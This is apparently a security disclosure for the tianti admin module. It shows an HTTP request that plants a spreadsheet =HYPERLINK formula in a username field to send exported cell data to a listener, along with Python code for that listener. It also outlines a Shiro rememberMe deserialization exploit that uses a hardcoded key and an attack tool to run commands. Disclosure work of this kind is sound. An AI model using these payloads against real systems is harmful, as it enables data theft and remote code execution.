sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8888/tianti-module-admin/user/update_pwd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D1E9B42664FA8DF416B5D97A8CEAA805; _jspxcms=0bdeaa17af6448558d5181a98d4df1a0; Hm_lvt_57e9a5bfc4003c9bc1fd23dba7598170=1664259891; Phpstorm-66f14989=68db331b-21f1-4319-88e3-036932e5e8ad; _jpanonym="MGUyNzc1N2NmY2QwZTA0MDk4YzBlN2ZjNTY2YzBjYTQjMTY2ODM0MDQ1NjU5MCMzMTUzNjAwMCNOekkyTXpOaE1tVXpZak5sTkRCallqaGtORFZtTm1abE5qUm1OV1V4WkRRPQ=="; Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a=1668340479; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1669038142,1669101592,1669167302; Hm_lvt_1040d081eea13b44d84a4af639640d51=1669203862; __bid_n=184a44da31c5abff074207; PUBLICCMS_ANALYTICS_ID=129faf04-65fd-46b0-8d88-56f21d780fe5; PUBLICCMS_ADMIN=1_e45b8556-ed10-4917-a0f5-8e9fc43a2828; JSESSIONID=d2e34d48-bb9d-4174-a34e-dff5b868def8
Connection: close

id=&username==HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")&password=123456&realName=&mobile=&roleId=

Successfully added user named =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")

Run the Python script to receive locally

from http.server import HTTPServer, BaseHTTPRequestHandler
import json

data = {'result': 'hacked'}
host = ('localhost', 8007)


class Resquest(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(data).encode())

if __name__ == '__main__':
    server = HTTPServer(host, Resquest)
    print("Starting server, listen at: %s:%s" % host)
    server.serve_forever()

When admin exports .xlsx file, Open .xlsx log file, double-click the cell of =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). Then click an empty cell. And then click the cell of =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). In this case, a request is sent to the localhost:8007.

First double-click the =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E") cell

Click on a blank cell

Finally, clicking the original cell again will send a request to localhost:8007 through the browser

It is recommended to shield the formula when exporting Excel to prevent the risk of CSV injection

The project has a shiro deserialization vulnerability

1、First, set up a local service and ensure that it can run properly
Find its background login address

2、We can see that remeberMe cipherKey has been written in the source code

3、Inspect the shiro frame using the shiro Blasting tool

4、Once the cipherKey is specified, blow up shiro's utilization chain

5、Discover the construction chain :CommonsBeanutilsString_183 The command output mode is AllEcho
6、The whoami command was successfully executed, confirming the existence of the vulnerability

7、Tool link：https://github.com/SummerSec/ShiroAttack2